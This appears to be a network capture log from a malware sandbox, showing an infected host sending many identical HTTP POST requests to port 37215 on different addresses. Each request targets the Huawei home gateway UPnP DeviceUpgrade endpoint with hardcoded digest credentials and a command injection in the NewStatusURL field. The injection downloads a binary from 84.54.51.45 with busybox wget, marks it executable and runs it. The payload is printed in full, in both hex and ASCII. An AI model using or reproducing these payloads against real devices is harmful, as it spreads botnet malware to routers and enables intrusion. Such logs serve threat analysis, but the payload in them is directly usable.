2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1844192.168.2.154432241.68.136.2837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466180086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1845192.168.2.154416041.71.148.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466201067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1846192.168.2.155469841.0.29.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466217995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1847192.168.2.154288841.224.248.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466233969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1848192.168.2.154076041.158.74.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466248989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1849192.168.2.153829841.57.40.3937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466264009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1850192.168.2.154783841.87.78.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466310978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1851192.168.2.155951041.205.169.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466310978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1852192.168.2.155572441.247.173.13737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466332912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1853192.168.2.156041641.181.249.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466352940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1854192.168.2.155898641.145.112.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466363907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
